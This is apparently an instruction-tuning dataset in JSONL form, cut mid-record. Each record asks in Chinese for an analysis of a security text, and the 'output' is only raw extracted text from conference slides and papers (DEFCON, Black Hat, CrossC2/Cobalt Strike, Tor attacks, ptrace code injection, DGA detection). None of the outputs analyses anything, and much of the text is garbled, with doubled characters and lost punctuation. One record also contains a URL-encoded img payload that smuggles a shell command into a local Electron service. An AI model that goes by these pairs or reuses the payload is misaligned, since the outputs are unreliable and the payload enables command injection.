DEFCON17 5 Some definitions and legalese-to-english translations:  Stored data and communications  In-transit communications  Legal person  Legal adult  Non compos mentis  Common law  Tort law  Jurisdiction  Agent (not secret, corporate)  Contract 2009-08-02 Your Mind: Legal Status, Rights and Securing Yourself - DEFCON17 6 Data and Document are sometimes, but not always interchangeably used by lawyers and legislators. We will use these working definitions:  Data: the lowest level of abstraction from which information and knowledge are derived. IE: Bytes arranged in order.  Document: a bound", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents PISE: Automatic Protocol Reverse Engineering Ron Marcovich, Orna Grumberg and Gabi Nakibly #BHUSA @BlackHatEvents Ron Marcovich M.Sc. Student Introductions Dr. Gabi Nakibly Senior Adjunct Lecturer Distinguished Researcher Formerly at Prof. Orna Grumberg Faculty Member #BHUSA @BlackHatEvents Agenda What is protocol RE? What is PISE all about? How PISE does its magic? S: 250 OK start R: HELO S: 250 OK R: MAIL FROM R: RCPT TO S: 250 OK R: DATA S: 550 R: RCPT TO R: RSET #BHUSA @BlackHatEvents Motivation and Background #BHUSA @BlackHatEvents Hi Hello How are you? I am fine. Tuesday What is protocol reverse engineering? #BHUSA @BlackHatEvents 250 OK HELO 250 OK MAIL FROM RCPT TO Mail Client Mail Server What is protocol reverse engineering? #BHUSA @BlackHatEvents 250 OK start HELO 250 OK MAIL FROM RCPT TO 250 OK DATA 550 RCPT TO RSET RCPT%20TO:*%0D%0A R: R: R: R: R: S: S: S: S: R: Mail Server What is protocol reverse engineering? #BHUSA @BlackHatEvents data init data finish data Server Client Motivation I  Finding Bugs #BHUSA @BlackHatEvents init getFile deny SesameGetFile file Server Client Motivation II  Finding backdoors #BHUSA @BlackHatEvents C&C channel Get info Send Spam DoS <url> Motivation III  Analyzing Malware #BHUSA @BlackHatEvents It can be days or even weeks! Protocol RE is Hard! #BHUSA @BlackHatEvents start R: HELO S: 250 OK R: MAIL FROM S: 250 OK R: RCPT TO S: 250 OK R: DATA S: 550 R: RCPT TO R: RSET RCPT%20TO:*%0D%0A Research Goal #BHUSA @BlackHatEvents No past traffic captures No active protocol peer No source code No Assumptions #BHUSA @BlackHatEvents PISE is action, Examples and Demo #BHUSA @BlackHatEvents First, we crafted a toy example login ok1/ok2 logout1/logout2 #BHUSA @BlackHatEvents SMTP client We wanted to get to the real thing #BHUSA @BlackHatEvents Messages formats are extracted as well! We wanted to get to the real thing #BHUSA @BlackHatEvents Remember those days when we had no idea what Zoom is?  Then COVID came. #BHUSA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2011 NATO Cooperative Cyber Defence Centre of Excellence, June 2011 All rights reserved. No part of this pub- lication may be reprinted, reproduced, stored in a retrieval system, or transmitted in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without the prior written permission of the NATO Cooperative Cyber Defence Centre of Excellence. Publisher: CCD COE Publication Filtri tee 12, 10132 Tallinn, Estonia Tel: +372 717 6800 Fax: +372 717 6308 E-mail: ccdcoe@ccdcoe.org www.ccdcoe.org Print: OÜ Greif Trükikoda Design & Layout: Marko Söönurm Legal notice NATO Cooperative Cyber Defence Centre of Excellence assumes no responsibility for any loss or harm arising from the use of information contained in this book. ISBN 978-9949-9040-5-1 (print) ISBN 978-9949-9040-6-8 (epub) ISBN 978-9949-9040-7-5 (pdf) KENNETH GEERS STRATEGIC CYBER SECURITY NATO Cooperative Cyber Defence Centre of Excellence Abstract This book argues that computer security has evolved from a technical discipline to a strategic concept. The worlds growing dependence on a powerful but vulnerable Internet  combined with the disruptive capabilities of cyber attackers  now threat- ens national and international security. Strategic challenges require strategic solutions. The author examines four nation- state approaches to cyber attack mitigation.  Internet Protocol version 6 (Ipv6)  Sun Tzus Art of War  Cyber attack deterrence  Cyber arms control The four threat mitigation strategies fall into several categories. IPv6 is a technical solution. Art of War is military. The third and fourth strategies are hybrid: deter- rence is a mix of military and political considerations; arms control is a political/ technical approach. The Decision Making Trial and Evaluation Laboratory (DEMATEL) is used to place the key research concepts into an influence matrix. DEMATEL analysis demon- strates that IPv6 is currently the most likely of the four examined strategies to improve a nations", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTransformations Defcon 21 IPv4  IP ID Randomization o Exclude Fragments o Others  Randomize and Clear Outgoing DF  TTL Standardized o Exclude ICMP Echo Requests and Routing Protocols (RIP, BGP) o Others  Accounting for Hops Already Traveled o Recalibrate for Maximum Allowed  ToS Cleared  ECN Cleared IPv6  Hop Limit Standardized o Exclude ICMP Echo Requests and Routing Protocols (RIP, BGP) o Others  Accounting for Hops Already Traveled o Recalibrate for Maximum Allowed  Traffic Class Cleared TCP  Discard Aberrant Flag Combinations (Enforce Strict RFC for all TCP flag combinations) o Null o Christmas Tree o SYN, FIN, ACK o Etc   TCP Option Standardization o Parameters  MSS, Window, SACK, and MD5 Only o Values - Original o Order  MSS, Window, SACK, and MD5 (if present) o Padding  NOP till the end of original length  URG Flag and URG Pointer Cleared", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCrossC2基本满足了我对linux C2的需求 最近用碎片时间学习和使用了一下CrossC2可以看出是一线小伙伴结合实战经验写出来的实用性工 具因此鼓励大家使用和反馈BUG给作者 1. 什么是CrossC2 CrossC2是一款扩展CobaltStrike在LinuxAndroidIOS等系统上使用的闭源免费工具作者编写了较 为详细的使用文档可以很快上手详情请阅读https://gloxec.github.io/CrossC2/zh_cn/ CobaltStrike: 暂时仅支持3.14最后一个版本(bug fixs), 以及4.x版本(详见cs4.1分支). Linux: 特别老旧的系统可以选择cna中的\"Linux-GLIBC\"选项2010年左右 MacOS: 新系统仅支持64位程序 iOS: sandbox Embedded: only *nix  : 加载还在完善中 2. 注意事项 CrossC2可执行文件windows版本有BUG请使用Linux版本和Mac版本 一定要注意作者master分支支持的是CS3.14由于大部分同学可能使用的是CS4.1因此一定要切 换到CS4.1分支去下载CrossC2 经和作者确认CS4.1分支只有基础功能其他类似frp等插件适配还需要继续开发CS3.14功能是完 善的 在c2profile配置中所有数据的编码只能使用base64其他方式皆不可使用 在c2profile配置中关于get和post的uri只能是用单个 作者提供的插件包中利用CS自带的文件浏览和进程浏览有点问题需要修改jar适配 作者给的c2profile.c示例文件中缺少了查找字符串函数的实现 3.使用感受 我只使用了简单的功能和自定义流量总体体验不错满足我C2基本要求命令文件隧道 char *find_payload(char *rawData, long long rawData_len, char *start, char *end, long long *payload_len) { rawData = strstr(rawData, start) + strlen(start); //*payload_len = xx; //返回找到的payload长度 *payload_len = strlen(rawData) - strlen(strstr(rawData, end)); //return payload; //返回找到的payload char *payload = (char *)calloc(*payload_len ,sizeof(char)); memcpy(payload, rawData, *payload_len); return payload; }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVanquishing Voyeurs: Secure Ways to Authenticate Insecurely Andrea Bianchi & Zoz ANDREA BIANCHI ZOZ Overview  Password/PIN Features & Observation Attacks  Observation from Without  Physical Key Entry at Insecure Terminal  Mechanical Observation-Resistant Solutions  Observation from Within  Key Protection between Insecure Input Device and Network  Recorder/Logger Subversion  Rethinking Password Entry Mechanics  Remote Entry with Secure Transmission to Terminal  Utilization of Common Mobile Digital Devices PASSWORD TOKEN BIOMETRIC AUTHENTICATION METHODS alphanumerical graphical haptic ... keys RFID security cards ... fingerprints retina scanner voice vein scanners ... NEED FOR PASSWORDS PASSWORDS PASSWORDS TOKENS TOKENS BIOMETRICS BIOMETRICS + - + - + - Common Delegation Cheap Invisible information Observation Memory (scaling, cognitive load) Common Delegation Cheap Physical Property: can be stolen, lost, copied, deteriorated Can be easily accepted by people [Coventry 2003] No cognitive load Physical Property: can be observed, copied, deteriorated Technology not ready yet Philosophical issues concerning identification No delegation NEED FOR PASSWORDS INVISIBLE INFORMATION + DELEGATION HIGH COGNITIVE LOAD Passwords are still valuable compared to other options, and this is why they are the most common in security systems. However their cognitive load is ultimately caused by their weakness against observation. THE PROBLEM WITH PASSWORDS Passwords are subjected to observation > need to have many passwords and change them frequently > high cognitive load OBSERVATION ATTACKS HUMAN INTERFACE EXTERNAL HUMAN INTERFACE INTERNAL NETWORK e.g.: Shoulder Surfing Mirrors/Cameras Keypad Dusting e.g.: ATM Skimmers Keyloggers e.g.: Sniffing MITM ENCRYPT SECURE PRIVATE INTERFACE WHAT ABOUT WHEN WE HAVE TO USE PUBLIC TERMINALS? PUBLIC TERMINALS ATMs Airport kiosks Door locks Public computers Access control PIN ENTRY TERMINALS What about bank ATM (Automatic Teller Machine) terminals? ... the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nasar e app.asar dst 0x00 0x01 0x02 <body> <img src='https://127.0.0.1:54530/a=%3A%22%5C%22%20-a%3Bopen%20%2FSystem%2FApplications%2FCalendar.app%3B%5C%22%22%2C %22withShortcut%22%3A1%7D'></img> </body>  0x03 awvs  0x03", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x0000 We are not as strong as we think we are  Rich Mullins <GHz or bust! leveraging the power of the chipcon 1111 (and RFCAT) 0x1000  intro to <GHz  FCC Rules(title 47) parts 15 and 18 allocate and govern parts of the RF spectrum for unlicensed ISM in the US (US adaptation of the ITU- R 5.138, 5.150, and 5.280 rules)  Industrial  power grid stuff and more!  Science  microwave ovens?  Medical  insulin pumps and the like  US ISM bands:  300 : 300  433 : 433.050  434.790 MHz  915 : 902.000  928.000 MHz  cc1111 does 300-348, 372-460, 779-928... but we've seen more.  Popular European ISM band:  868 : 863.000  870.000 MHz  Other ISM includes 2.4 GHz and 5.8 GHz  cc2531.... hmmm... maybe another toy? 0x1010  what is <GHz? what plays there?  Industry, Science, Medical bands, US and EU  Cell phones  Cordless Phones  Personal Two-Way Radios  Car Remotes  Pink IM-ME Girl Toys!  TI Chronos Watches  Medical Devices (particularly 401-402MHz, 402-405MHz, 405-406MHz)  Power Meters  custom-made devices  Old TV Broadcast  much, much more...  cc1110/cc1111 do 300-348MHz, 391-464MHz, 782-928MHz  and more...  RFCAT uses the CC111x on some common dongles  Chronos dongle (sold with every TI Chonos watch)  Don's Dongles, aka TI CC1111EMK  IMME (currently limited to sniffer/detection firmware)  but there are some catches  rf comms configuration?  channel hopping sequence?  bluetooth and DSSS? (not hap'nin) 0x1020  how do we play with it? 0x1030  why do i care!?  the inner rf geek in all of us  your security research may require that you consider comms with a wireless device  your organization may have 900MHz devices that should be protected! 0x2000  cc1111 summary SPEED READER!  modified 8051 core  8-bit mcu  single-tick instructions  256 bytes of iram  4kb of xram  XDATA includes all code, iram, xram  execution happens anywhere :)  Full Speed USB  RfCat hides most of these details by default! 0x2010  cc1111 radio state engine IDLE CAL FSTXON RX TX 0x2020  cc1111 radio configuration  conf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1584-001-盗取基础设施-域名 ## 来自ATT&CK的描述 攻击者可能会劫持域名或子域名以便在攻击目标过程中使用域名注册劫持是指未经原注册人允许而改变域名注册的行为攻击者可能获得被列为域名所有者的电子邮件账户然后攻击者可以声称他们忘记了自己的密码以便对域名注册进行更改其他的方法包括通过社会工程使域名注册服务台获得对账户的访问权或者利用续费过程中的漏洞 当组织的DNS设置指向不存在的或被取消的资源时就会发生子域劫持在这种情况下攻击者可能会控制一个子域利用与该域相关的信任来进行操作  ## 测试案例 子域名劫持漏洞详解挖掘和防护 <https://blog.csdn.net/nini_boom/article/details/108308966> 关于子域名劫持的一些总结 <https://xz.aliyun.com/t/6683> ## 检测日志 无法有效监测 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 ### 缓解措施 这种技术不容易用预防控制来缓解因为它是基于企业防御和控制范围之外的行为 ### 检测 这种活动大多发生在目标组织的能见度之外使得对这种行为的检测变得困难检测工作可能集中在攻击生命周期的相关阶段如在指挥和控制期间 ## 相关TIP [[T1584-002-盗取基础设施-DNS服务]] [[T1584-003-盗取基础设施-虚拟专用服务器]] [[T1584-004-盗取基础设施-服务器]] [[T1584-005-盗取基础设施-僵尸网络]] [[T1584-006-盗取基础设施-web服务]] ## 参考推荐 MITRE-ATT&CK-T1584-001 <https://attack.mitre.org/techniques/T1583/001/> 子域名劫持漏洞详解挖掘和防护 <https://blog.csdn.net/nini_boom/article/details/108308966> 关于子域名劫持的一些总结 <https://xz.aliyun.com/t/6683>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Cavalry Year[0] A Path Forward for Public Safety The Cavalry Year[0] A Path Forward for Public Safety Joshua Corman && Nicholas J. Percoco Our Dependance on Technology is Growing Faster than our Ability to Secure it. Problem Statement: While we struggle to secure our organizations, connected technologies now permeate every aspect of our lives; in our cars, our bodies, our homes, and our public infrastructure. Our Mission: To ensure technologies with the potential to impact public safety and human life are worthy of our trust. Collecting, Connecting, Collaborating, Catalyzing Our Approach: Collecting existing research and researchers towards critical mass. Our Approach: Connecting researchers with each other and stakeholder in media, policy, legal, and affected industries. Our Approach: Collaborating across a broad range of background and skill sets. Our Approach: Catalyzing research and corrective efforts sooner than would happen on their own. Our Approach: One thing is clear The Cavalry Isn't Coming It Falls To Us One thing is clear The Cavalry Isn't Coming It Falls To Us It Falls To YOU One thing is clear The Cavalry Isn't Coming It Falls To Us It Falls To YOU We must be ambassadors of our profession We must be the voice of technical literacy We must research that which matters We must amplify our efforts We must escape the echo chamber We must team with each other Year[0] Activities Year[0] Activities Research Conferences Government Industry Press Deliverables What Worked Well What Worked Well The Mission The problems statement, instinct & timing were right. While pieces of this were tried before, timing matters Collecting, Connecting, Collaborating, Catalyzing Teamwork and collective knowledge proved immediately useful to existing research & researchers. E.g. in Medical & Auto It Takes a Guild Diverse, but complementary skills made us stronger - including people from industry, from government, and/or people less interested in being public rockstars What Work", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n黃建忠 (from TAIWAN) whoami  現任研究生  Linux 愛好者關注系統安全領域  不是哪個資 ( ㄏㄞ ˋ) 安 ( ㄎㄜ ˋ) 組織或 公司的成員  簡單說就是一個路人 QQ 今天講什麼  一點點的除錯器 (debugger) 實現原理  Memory search  Code injection  Dynamic library function hooking 易 一點點難 題目有點簡單 ...... 今天的目標 本投影片提供足夠的資 訊希望讓各位看完後 都有能力自己實作相關技 術 我們需要的東西  一台 Linux 機器 (64 位元 ) Linux Mint 17  Python(2.7.6)  一點點的 c 語言和 intel x64 組語 Part 1 一點點的除錯器實現原理 除錯器是啥  用來惡搞或蹂躪其他 process 的遙控器  GDB,ollydbg..... 等 看起來很好很強大 ,BUT.....  我想找哪條指令或數值在 memory 的哪 裡  我想對別的 process 加很多料  我們需要一個客製 , 自動化的工具 你不會想一直拿著遙控器的 ... 自己的工具自己寫 !!  除錯器是怎麼運作的 ?  怎麼去改或讀其他 process 的 memory ? 如何讀寫其他 process 的 memory?  ptrace (linux 提供的一個 system call)  /proc/pid/mem (kernel >= 2.6.39)  process_vm_readv, process_vm_writev( kernel >= 3.2) 下斷點 (set breakpoint)  讓 process 停在想停的地方  寫入 int 3(0xcc) 指令  用 wait() 等待 trap 事件的發生 執行後 用 wait() 來等待 trap ptrace(1)  功能很多但我們只有下列需求  讀寫 data 從 ( 到 ) 某個地址 (8 bytes in x64)  Attach,continue,detach process  讀或寫暫存器的值 ptrace(2) 記憶體讀寫 Process 控制 暫存器讀寫 那用什麼語言寫 ?  我就是不想用 C 語言寫 人生苦短 , 請用 python ctypes  python 的標準模組  在 python 用 c 的 library  要知道我們要的 function 在哪個 library printf 在 libc.so.6 ptrace,wait, 常用 function.... ctypes- 定義變數 (1) ctypes type C type Python type c_char char 1-character string c_long long int/long c_ulong unsigned long int/long c_char_p char * (NUL terminated) string or None c_void_p void * int/long or None 在 python 定義 c 語言型態的變數 ctypes- 定義變數 (2) 定義 Array ctypes- 定義結構體 C Python 微 debugger Part 2 Memory search Memory search  尋找特定指令或數值的位址  應用  找 ROP gadget   遊戲修改器  但是我後面都不是以上用途 ....... Memory search- 怎麼找  man proc  /proc/[pid]/maps 看地圖 )  收集相關資訊  /proc/[pid]/mem  從這邊找 /proc/[pid]/maps r-xp code segment rp 和 rw-p data segment 載入 SO 記憶體區段位址範圍 也包含 heap 和 stack 相關資訊 /proc/[pid]/mem(1)  Process 的 memory 內容  可當作 file 存取 (open,read,lseek)  需要先用 ptrace attach 後才可以存取 需要 ROOT 權限 /proc/[pid]/mem(2)  在 python 怎麼存取  就像處理普通的 file /proc/[pid]/mem- 範例 相關訊息都由 proc/[pid]/maps 取得 48 83 c4 08 c3 複製貼上就好 /proc/[pid]/mem- 執行 Part 3 Code injection Code injection  把指令寫入到目標 process 的 memory  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAssessing Civilian Willingness to Participate in On-line Political and Social Conflict 1 Tom Holt, Ph.D. Assistant Professor Michigan State University Spartan Devils Honeynet Chapter Max Kilger, Ph.D. Profiler The Honeynet Project Political Conflict On and Off-Line 2  There has been significant attention in popular media on the role of technology in political conflict across the globe over the last few years  The Danish Cartoon Attacks  Russia/Estonia Conflict  Egypt  Iran  Operation Payback Anonymous attacks Political Conflict On and Off Line  Asymetric warfare and civilian attack is now a realistic and cost-effective attack vector  Restructuring power relationships between the individual and the nation-state  Technology is a useful mechanism for several reasons  Near real time communication  Potential level of damage can be significant  Low cost  Anonymity  Minimal legal risk depending on activity 3 Preliminary Data and Model Statistical Model Building  We are starting to get some preliminary data  Respondents are undergrad and grad students at a large Midwest university  Also beginning to build some preliminary statistical models  Were looking for other universities to collaborate with for cross-national comparisons 4 Different Social Dimensions Under Investigation as Related to Civilian Cyber Warrior Behavior  Civilian Cyber Warrior study is concentrating on..  Dependent variables  Willingness to commit acts of cyber terror against another country  Willingness to commit acts of cyber terror against their own country  Willingness to commit acts of physical terror against another country  Willingness to commit acts of physical terror against their own country 5 Physical Attack Scale Against Foreign Country  Imagine that the country of Bagaria has recently promoted national policies and taken physical actions that have had negative consequences to the country that you most closely associate as your home country or homeland. These policies and actions have also resu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTotal Recall Implicit Learning as a Cyptographic Primitive Tess Schrodinger  Introduction  Curriculum vitae  Cognitive Memory  Consciousness  Sub consciousness Thoughts(&(Perceptions Memories(&(Stored(Knowledge Fears Violent(Motives Unacceptable(Sexual(Desires Irrational(Wishes Immoral(Urges Shameful(Experiences Selfish(Needs Subconscious Explicit Memory  Episodic  Semantic Implicit Memory Stages of Memory  Encoding  Storage  Retrieval  Context, Associate, Mood ENVIRONMENTAL+ INPUT SENSORY+INPUT (Sight,+Sound,+Etc.) SENSORY+MEMORY (Iconic/Echoic) FORGOTTEN FORGOTTEN+THROUGH INTERFERENCE+OR+ RETRIEVAL+FAILURE LONG+TERM+MEMORY MAINTENANCE SHORT+TERM+MEMORY FORGOTTEN+THROUGH DECAY+OR+ DISPLACEMENT Atkinson & Shiffrin Model ATTENTION RETRIEVAL ELABORATE REHEARSAL LEADS.TO STORAGE REHEARSAL Passwords & Human Memory Limitations NUMBER.OF.NEURONS 1.BILLION Number.of.connections.each Neurons.forms.with.other.neurons 1,000 Resultant.number.of.connections 1.TRILLION Total.Brain.Memory.Storage.Capacity 2.5$petabytes (A$million$gigabytes) Around.3.million.hours.of.TV.shows. Current Research Neuroscience Meets Cryptography Conclusions Questions", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLicensing Agreements 101: The Creative Commons DefCon 13  June 29-31, 2005 Presented By: Jim Rennie Licensing Agreements 101: The Creative Commons - Slide 2 of 36 Disclaimer This Presentation is for educational purposes only. It is not legal advice. The speaker is not a lawyer. If you require legal advice, retain a lawyer licensed to practice law in your jurisdiction. Licensing Agreements 101: The Creative Commons - Slide 3 of 36 Agenda Introduction Background on the Creative Commons License Walk through the license section-by- section How to maximize your protection Questions Licensing Agreements 101: The Creative Commons - Slide 4 of 36 Introduction Who are you? Why are you talking about the Creative Commons License? Licensing Agreements 101: The Creative Commons - Slide 5 of 36 Who uses the CC License? Writers, Bloggers, Musicians, Artists Moveable Type / TypePad Flickr Yahoo! LimeWire Licensing Agreements 101: The Creative Commons - Slide 6 of 36 What is the Creative Commons? Non-profit organization Creative Commons founded in 2001 by the Berkman Center for Internet & Society at Harvard Law School Currently run under at Stanford Law School Center for Internet Law and Society Licensing Agreements 101: The Creative Commons - Slide 7 of 36 Why was the CC License created? Belief that sharing content more freely fosters innovation and creation Non-coder counterpart to the GPL Perceived need in the online community Licensing Agreements 101: The Creative Commons - Slide 8 of 36 Which CC License are we talking about today? Attribution Non-Commercial Share Alike Version 2.5 Commons Deed Licensing Agreements 101: The Creative Commons - Slide 9 of 36 What is a License? Giving some of your rights or privileges to another person who would not normally have them. Licensing Agreements 101: The Creative Commons - Slide 10 of 36 What is a Contract? An Agreement between (at least) two parties. Each party must provide something in exchange. Exchange can be benefit or detriment, ei", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecuring the Tor Network Black Hat USA 2007 Supplementary Handout Mike Perry This handout is not a standalone document. It is intended to be used in conjunction with the presentation slides, and together the two documents should be sufficient to serve as a comprehensive artifact of the presentation. The speaker will refer to some figures and pages by number during the presentation. Black Hat USA 2007: Securing the Tor Network Supplementary Handout Tor Routing Tor traffic is routed through 3 nodes by default: Guard, relay, and exit. In normal operation, a given user only has 2 guard nodes that they use exclusively. The relay node is chosen arbitrarily, and the exit node is chosen according to its exit policy, which specifies which IPs and ports it will connect to. Paths are changed roughly every 10 minutes. This diagram illustrates two important properties of Tor. First, the two clients illustrate the multiplexing of multiple circuits over a single node-to-node TLS connection. Second, the bottom client illustrates the stream multiplexing capability: multiple TCP connections can be carried over a single Tor circuit. Each node knows only the source and destination pairing for a circuit. It does not know the whole path. This diagram illustrates the Tor circuit level encryption mechanism. Node-level communications are encrypted with TLS connection. Inside this, the Tor Directory lists public keys that the client uses to establish the three secret AES session keys between itself and each successive hop in the circuit. Page 2 Illustration 2: Tor Encryption Illustration 1: Routing Diagram Black Hat USA 2007: Securing the Tor Network Supplementary Handout Points of Attack There are obviously a lot of attack points here, some more serious than others, and some can be performed in a few different ways. The following are worth discussing in extended detail: 1. Application Layer Attacks. These attacks revolve around feeding the application some type of data that either causes it", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCisco Talos Mahdi Namazifar, PhD DETECTING RANDOM STRINGS; A LANGUAGE BASED APPROACH ! Given an arbitrary string, decide whether the string is a random sequence of characters ! Disclaimer 1: This work does not address strings that are random sequences of dictionary words ! Disclaimer 2: The current parameters of the code are tuned for strings with length 8 or more PROBLEM DEFINITION ! Detecting domain names that are generated by Domain Generation Algorithms (DGA) ! Many have studied this problem: ! Papers such as: ! S. Yadav, A. Reddy, A.L.N. Reddy, and S. Ranjan, \"Detecting Algorithmically Generated Malicious Domain Names\", IMC10, November 13, 2010, Melbourne, Australia. ! J. Raghurama, D.J. Millera, and G. Kesidis, \"Unsupervised, low latency anomaly detection of algorithmically generated domain names by generative probabilistic modeling\", Journal of Advanced Research, Vol. 5, Issue 4, pp. 423433. !  ! Bayesian network approaches ! Random Forrest classifiers !  MOTIVATION AND BACKGROUND ! Gather as many dictionaries as you can ! Look up substrings of a given string in the dictionaries ! Based on ! number of dictionary hits ! length of substrings that were in a dictionary ! number of different languages needed to cover the substrings define a randomness score. ! Used the score to determine whether the string is random OUR APPROACH; THE BIG PICTURE MEGA DICTIONARY Afrikaans English* Hungarian Malay Scottish Gaelic Tsonga Akan Esperanto** Indonesian Mandarin Slovene Tswana Albanian Estonian Interlingua** Māori Southern Ndebele Turkish Bulgarian Faroese Italian Norwegian* Southern Sotho Ukrainian Catalan* French* Kinyarwanda Occitan Spanish* Venda Chichewa Frisian Kurdish Polish Swahili Vietnamese Croatian Gaeilge Latin Portuguese* Swati Welsh Czech Galician Latvian Romanian Swedish Xhosa Danish German* Lithuanian Russian* Tagalog Zulu Dutch Greek Malagasy Saraiki Tetum MEGA DICTIONARY  LANGUAGES\" \" Source: OpenOffice and others * Different versions of the language ** ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n聊聊这一年年多以来 如何建设滴滴DSRC 分享嘉宾:安惞 今天我打着滴滴来滴滴安全大会一边听着平凡之 路路一边看着窗外的蓝天白云回忆起几年年前在寒风 中等车在地铁中赶路路感觉真幸福 滴滴改变出行行 滴滴改变出行行 现在4.5亿人的出行行方式因为滴滴一下马上出发 发生了了改变 白帽子 漏漏洞洞 互联网企业 情报经验和传播共享 安全厂商 产品技术人才合作 高校 人才漏漏洞洞学术 媒体 传播信息资源 政府 法律律法规 谁来保护滴滴4.5亿用户的信息安全 安全生态圈 注部分内容参考老老马哥哥默安科技公众号发布的文章浅谈企业安全技术品牌建设 漏漏洞洞 人才 影响力力 白帽子 DSRC能做什什么 白帽子 DSRC通过参照AARRR体系 建立与白帽子关系维护的方法 包括白帽子的拉新促活留留存 转化和推荐 白帽子推荐 白帽子转化 白帽子留留存 白帽子促活 白帽子拉新 提升白帽子 数量量质量量 提升漏漏洞洞 数量量质量量 白帽子 白帽子 Revenue Retention Activiation Acquisition Refer From AARRR 白帽子 白帽子 白帽子拉新 01 02 03 渠道 SEOSEM 安全媒体论坛 社群QQ群/微信群 新媒体微博/微信公众号 业界安全大会 推广 线上推广 自主自媒体运营活动营销人工邀请SEO 合作友商互推项目合作媒体传播 线下推广 自办大会 友商大会站台 成本 即愿意投入到白帽子运营的 财物人力力和时间成本 优质内容输出 趣味文章 技术文章 阶段促活活动 自营活动 合作活动 白帽激励体系 物质 精神 权益 白帽成长体系 白帽积分体系 阶段性评价 白帽子促活 白帽子 白帽子 白帽子N月留留存率= 该自然月后第N个自然月提交漏漏洞洞白帽子数/该自然月提交漏漏洞洞白帽子数 总体 数量量 1月 2月 3月 4月 1月白帽子 x 100% 50% 25% 15% 2月白帽子 y 100% 50% 25% 3月白帽子 z 100% 50% 白帽子留留存 白帽子促活 白帽子拉新 白帽子推荐 白帽子转化漏漏洞洞 生命周期 用户属性 用户渠道 白帽子召回 标准化服务 白帽子沟通 白帽子画像 争议协调 情感关怀 用户调研 原因分析 优化 定级处理理 奖励 白帽子 白帽子 白帽子留留存 通过促活留留存提升用户数量量质量量 通过分析复盘优化产品策略略 1.漏漏洞洞转化 注册白帽子 白帽子 白帽子转化 白帽子 3% 8% 20% 100% 提交漏漏洞洞白帽子 漏漏洞洞有效白帽子 高质量量白帽子 分析等量量等质漏漏洞洞 SRC和非SRC渠道的成本 包括人力力财力力时间 2.成本转化 白帽子推荐 白帽子 白帽子 自媒体 核心白帽子 安全团队 漏漏洞洞 像产品有自己的生命周期漏漏洞洞也 有自己的生命周期 DSRC的漏漏洞洞生命周期又是从何开 始从何结束 DSRC漏漏洞洞闭环周期 对外 白帽子运营 拉新 促活 1 漏漏洞洞拉新 2 漏漏洞洞发现 对内 内部漏漏洞洞提交 对外 DSRC平台 外部报告 对内 应急响应 漏漏洞洞审核 对外 争议协调 漏漏洞洞激励 规范化 3 漏漏洞洞响应 4 漏漏洞洞修复 对内 漏漏洞洞管理理平台 流程化规范化通知机制 知识库资产人员 对外 更更新状态 对内 安全流程补查 安全产品漏漏报 安全报告通报 改进措施落地 对外 额外激励 5 漏漏洞洞复盘改进 漏漏洞洞闭环 漏漏洞洞 自主 漏漏洞洞闭环 漏漏洞洞拉新 优势 忠诚度高漏漏洞洞质量量高 劣势 资源较少自主打造影响力力难度大 优势 白帽子基数大提升影响力力 注意 需保障安全 合作 VS 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞发现 http://sec.didichuxing.com/ DSRC平台 官方唯一对外 收集滴滴相关安全漏洞的平台 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞响应 迅速响应 日志排查 争议协调 漏漏洞洞响应SLA 高危严重通报 利利用与否 同类排查 原因分析 被忽略略 评级差异 漏漏洞洞已知 规范未覆盖 DSRC漏洞争议协调三原则 1. 尊重白帽子的劳动成果和自尊心 2. 信任安全工程师的技术专业水平 3. 若争议是由于规范不明导致以白帽子的利益作为该case的判定出发点然后优化规范 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞修复 规范化 产品化 自动化 分类 定级 流程 SLA 工作流 通知机制 漏漏洞洞去重 资产 人员 知识库 扫描器器 漏漏洞洞 漏漏洞洞闭环 漏漏洞洞复盘改进 意识需分设计开发 测试运维 扫描器器 防护产品 逻辑业务流程 账号支付 SDL流程复盘 1 安全产品复盘 2 业务安全复盘 3 注意改进措施责任到人明确到时间点且持续跟进 人才 21世纪最值钱的是什什么 人才 人才从哪里里来 DDCTF选拔优质信息安全人才加盟 滴滴出行行信", "category": "text_analysis", "source": "security_papers"}
